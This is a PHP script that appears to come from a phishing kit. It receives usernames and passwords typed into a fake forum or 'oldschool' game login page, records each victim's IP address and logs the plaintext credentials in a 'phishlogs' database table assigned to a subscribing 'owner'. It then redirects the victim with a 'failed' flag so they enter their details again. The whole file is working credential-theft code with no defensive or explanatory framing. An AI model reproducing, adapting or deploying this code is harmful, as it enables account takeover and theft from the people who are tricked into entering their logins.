Untitled

<?php
	session_start();

	if (!isset($_POST['username'],$_POST['password'],$_POST['userID']))
		die();

	$included = true;
	include_once('db.php');


	$method = $_POST['method'];
	$dir = $_POST['dir'];
	$userID = $_POST['userID'];

	$query = $Database->selectPrepare("SELECT * FROM `phishlinks` Order by `ID` DESC LIMIT 1", array());
		while ($getInfo = $Database->fetchObject($query))
		{

		$link1 = $getInfo->link1;
		$link2 = $getInfo->link2;
		$thread1 = $getInfo->thread1;
		$thread2 = $getInfo->thread2;
		$poll1 = $getInfo->poll1;
		$poll2 = $getInfo->poll2;

		$amount = $getInfo->amount;
		}
	$query = $Database->selectPrepare("SELECT * FROM `phishdomains` where `domain` = :domain Order by `ID` DESC LIMIT 1", array(":domain" => $domain));
		while ($getDomainInfo = $Database->fetchObject($query))
		{

		$linksub = $getDomainInfo->linksub;
		$threadsub = $getDomainInfo->threadsub;
		$pollsub = $getDomainInfo->pollsub;
		$linkssl = $getDomainInfo->linkssl;
		$threadssl = $getDomainInfo->threadssl;
		$pollssl = $getDomainInfo->pollssl;
		}


	$loginlink = "forums.ws".$link2."";


	$redirectLocation = "http://bit.ly/Ryv62h";


	switch ($method) {
		case "poll":
			if (!isset($_SESSION['try'])) {
				//$redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed&p";
				$_SESSION['try'] = 1;
			}
			else if ($_SESSION['try'] == 1) {
				//$redirectLocation = "".$pollssl.$pollsub.".".$domain."/".$poll1."/oldschool/".$dir."/results.php?id=".$userID."&success";
				unset($_SESSION['try']);
			}
		break;

		case "thread":
			if (!isset($_SESSION['try'])) {
				//$redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed&t";
				$_SESSION['try'] = 1;
			}
			else if ($_SESSION['try'] == 1) {
				//$redirectLocation = "".$threadssl.$threadsub.".".$domain."/".$thread1."/".$loginlink."/".$dir."/?id=".$userID."";
				unset($_SESSION['try']);
		}
		break;

		default:
			if (!isset($_SESSION['try'])) {
				//$redirectLocation = "".$linkssl.$linksub.".".$domain."/".$link1."/".$loginlink."/".$dir."/?id=".$userID."&failed";
				$_SESSION['try'] = 1;
			}
			else if ($_SESSION['try'] == 1) {
				unset($_SESSION['try']);
		}
	}


	if (isset($_SERVER['HTTP_CF_CONNECTING_IP']))
		$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CF_CONNECTING_IP'];

	$username = $_POST['username'];
	$password = $_POST['password'];
	$ip= $_SERVER['REMOTE_ADDR'];

	$strippeduser = strip_tags($username);
	$strippedpass = strip_tags($password);


		$query = $Database->selectPrepare("SELECT * FROM `users` WHERE `ID` = :ID Order by `ID` DESC LIMIT 1", array(":ID" => $userID));
		while ($getInfo = $Database->fetchObject($query))
		{
		$timezone = $getInfo->timezone;
		$plan = $getInfo->membership;
		}

	date_default_timezone_set($timezone);
	$today = time();


switch ($plan) {
    case 0:
        $owner = 1;
        break;
    default:
        $owner = $userID;
}

	$valid = "0";
	$status = 0;

	$logcount = $Database->countRow($Database->selectPrepare("SELECT * FROM phishlogs WHERE `user` = :user AND `pass` = :pass AND `ip` = :ip AND `owner` = :owner", array(":user" => $username, ":pass" => $password, ":ip" => $ip, ":owner" => $owner)));


	if ($logcount > 0){

	}else{

	$Database->selectPrepare("INSERT INTO phishlogs (user, pass, date, ip, owner, status, valid) VALUES (:username, :password, :date, :ip, :owner, :status, :valid)",
		array(':username' => $strippeduser, ':password' => $strippedpass, ':date' => $today, ':ip' => $ip, ':owner' => $owner, ':status' => $status, ':valid' => $valid));
	}

	$Database->closeConnection();
	header ('Location: '. $dir .'&failed');
?>